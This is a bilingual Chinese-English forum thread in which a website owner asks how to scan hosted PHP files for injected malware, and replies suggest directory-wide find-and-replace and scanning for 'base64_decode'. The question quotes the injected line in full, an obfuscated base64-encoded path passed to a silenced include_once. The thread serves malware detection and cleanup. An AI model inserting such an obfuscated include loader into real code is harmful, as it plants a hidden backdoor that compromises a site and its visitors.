代码搜索目录和子目录中任何文件的特定代码
好吧,我对 php 很陌生,但我知道它可以读取目录和文件。
我一直在我们的一个网站上遇到恶意软件问题,我需要编写一个脚本来在我的主机空间上搜索它。
黑客放入文件中的代码是
*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmF ja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3 B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBp L0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>
我不知道这是什么,但当它出现时,谷歌会阻止我的网站。
我必须下载所有文件,然后在 Dreamweaver 中搜索它,用空格替换这个废话并将其放回去。
我需要一个脚本来在谷歌之前检测到这一点。
如果有人能给我一些指示,那就太好了,
我相信这是每个人现在或以后都会面临的问题。
Ok I am pretty new to php but I know it can read directorys and files.
I have been struggling with malware problem on one of our sites and I need to write a script to search for it on my host space.
The code the hackers are putting in the files is
*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>
I have no idea what this is but google blocks my site when this shows up.
I have to download all the files then search it in dreamweaver replace this crap with a space and put it back.
I need a script to detect this before google does.
If any one can give me some pointers it will be great
I am sure this is a problem that everyone will face now or later.
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(3)
纯 PHP 解决方案将查找并替换您提供的字符串。或者,您可以只获取已修改的文件。
注意:如果您使用此代码,则有NO UNDO选项,您需要自行承担使用它的风险。
您可以从浏览器或命令行运行该脚本。我并不是说这是最好的选择。
Pure PHP solution that will find and replace the string you provided. Alternatively, you can just obtain files that have been modified.
Note: if you use this code, there is NO UNDO option, you're using it on your own risk.
You can run the script either from browser or command line. I'm not saying this is the best option tho.
使用 FTP 下载所有内容并运行 find &替换为完整目录(dreamweaver 支持完整目录)。我也曾经遇到过这个问题,你可能也想在你的代码中寻找 javascript hacks,他们也倾向于执行 javascript include 。
黑客代码尝试包含此文件:
这是什么?我不知道,但这就是它正在尝试做的事情。因此,我认为您可能会认为此黑客攻击是从您托管的服务器内部完成的。
Download all with your FTP and run a find & replace for a complete directory (dreamweaver supports complete directories). I've had this problem once aswel, you might wanna look for javascript hacks in your code aswell, they tend to do javascript includes also.
The hack code tries to include this file:
What this is? I don't know, but that's what it's trying to do. So you might consider this hack to be done from inside the server you're hosted on I think.
如果您具有 SSH 访问权限,则可以使用类似 这个只需将“eval(base64_decode”替换为“base64_decode”。
如果没有,您将需要编写一个脚本来对所有文件进行递归循环与 readdir ,然后使用一些 strpos 魔术来检测“base64_decode”。
如果您确实遇到问题,我会推荐第 3 方服务,例如 sucuri
祝你好运!
If you have SSH access you can use a command like this just replace "eval(base64_decode" with "base64_decode".
If not you will want to write a script that does a recursive loop through all of your files with readdir and then use some strpos magic to detect "base64_decode".
And if your really having problems I would recommend a 3rd party service like sucuri.
Good luck!